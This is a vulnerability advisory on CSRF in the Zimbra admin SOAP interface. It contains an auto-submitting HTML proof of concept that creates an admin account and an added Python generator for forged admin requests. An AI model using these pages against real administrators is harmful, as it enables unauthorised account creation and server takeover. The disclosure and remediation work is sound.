Description

Multiple CSRF vulnerabilities have been found in the Zimbra administration interface. An attacker who lures a logged-in administrator onto a malicious page can perform administrative actions on their behalf, such as adding, modifying and removing admin accounts.

Zimbra kindly credited our efforts:

[Image: Zimbra credits]

Vulnerability

Every form in the Administration interface of Zimbra is vulnerable to CSRF, because requests to the admin SOAP API (port 7071) are accepted on the strength of the administrator's session cookie alone: no CSRF token ties a request to the session that issued it. As a consequence, any admin SOAP request can be forged from a third-party page and replayed against the browser session of a logged-in administrator. The proof of concept below uses an HTML form with enctype="text/plain" whose single field name and value are split at an "=" inside the XML, so the browser reassembles the raw SOAP envelope as the POST body.

Access Vector: remote

Security Risk: low

Vulnerability: CWE-352

CVSS Base score: 5.8

Proof of Concept

<html>
<body>
<!-- enctype="text/plain" makes the browser send the field as "name=value" followed by CRLF,
     without URL-encoding, so a single field can carry a raw SOAP envelope. -->
<form enctype="text/plain" id="trololo"
      action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
      method="POST">
    <!-- The field name is everything before the "=" of n="sn"; the value is everything after it.
         The browser inserts that "=" itself, so the body becomes the complete XML document. -->
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks@ubuntu.fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'
           value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
// Auto-submit as soon as the page loads: the victim's session cookie is attached by the browser.
document.forms[0].submit();
</script>
</body>
</html>
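The name/value split used by the proof of concept works for any single-line admin SOAP request, not only CreateAccountRequest. The following Python helper is an added example, not part of the original advisory or of Zimbra: it takes an arbitrary SOAP body, splits it at the first "=" (any "=" works, since the browser puts that character back), shows the exact text/plain body the browser will send, and renders the auto-submitting page. The target URL and account values are taken from the PoC above and are illustrative only.

```python
import html

# Constructed sample values, copied from the advisory's PoC (not a real deployment).
ADMIN_SOAP_URL = "https://192.168.0.171:7071/service/admin/soap/"

CREATE_ADMIN_XML = (
    '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">'
    '<soap:Header><context xmlns="urn:zimbra"><format xmlns="" type="js"/>'
    '</context></soap:Header><soap:Body>'
    '<CreateAccountRequest xmlns="urn:zimbraAdmin">'
    '<name xmlns="">itworks@ubuntu.fr</name>'
    '<password xmlns="">test1234</password>'
    '<a xmlns="" n="zimbraIsAdminAccount">TRUE</a>'
    '</CreateAccountRequest></soap:Body></soap:Envelope>'
)


def split_for_text_plain(payload: str) -> tuple[str, str]:
    """Split the payload at its first '=' so that name + '=' + value == payload.

    With enctype="text/plain" the browser joins the field name and value with
    a literal '=' and applies no percent-encoding, so the server receives the
    original XML unchanged.
    """
    if "\r" in payload or "\n" in payload:
        # text/plain form encoding normalises line breaks to CRLF, which would
        # alter the payload; keep SOAP bodies on a single line.
        raise ValueError("payload must be a single line")
    idx = payload.find("=")
    if idx < 0:
        raise ValueError("payload needs at least one '=' to be smuggled as name=value")
    return payload[:idx], payload[idx + 1:]


def text_plain_body(name: str, value: str) -> str:
    """The request body a browser sends for one text/plain form field."""
    return f"{name}={value}\r\n"


def build_csrf_page(action: str, payload: str) -> str:
    """Render an auto-submitting page that POSTs the payload to `action`.

    Attribute values are entity-escaped so quotes and angle brackets inside the
    XML cannot break out of the HTML attribute; the browser decodes them again
    before submitting.
    """
    name, value = split_for_text_plain(payload)
    return (
        "<html><body>\n"
        f'<form enctype="text/plain" method="POST" action="{html.escape(action, quote=True)}">\n'
        f'  <input name="{html.escape(name, quote=True)}" value="{html.escape(value, quote=True)}"/>\n'
        "</form>\n"
        "<script>document.forms[0].submit();</script>\n"
        "</body></html>\n"
    )


if __name__ == "__main__":
    n, v = split_for_text_plain(CREATE_ADMIN_XML)
    print("Body the browser will send:")
    print(text_plain_body(n, v))
    print(build_csrf_page(ADMIN_SOAP_URL + "CreateAccountRequest", CREATE_ADMIN_XML))
```

The same helper doubles as a regression check after upgrading: host the generated page, open it while logged in to the admin console, and confirm that the forged request is rejected rather than creating the account.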

Solution

  • Upgrade to version 8.7
  • Until the upgrade is applied, restrict access to the administration console port (7071) to trusted networks, and do not browse untrusted sites from a session logged in to the admin console

Affected versions

  • All versions prior to 8.7

Fixes

  • https://bugzilla.zimbra.com/show_bug.cgi?id=100885
  • https://bugzilla.zimbra.com/show_bug.cgi?id=100899

Timeline (dd/mm/yyyy)

  • 24/02/2016: Issue reported to Zimbra
  • 24/02/2016: Issue acknowledged by Zimbra

Credits

  • Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail -dot- fr)
  • Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)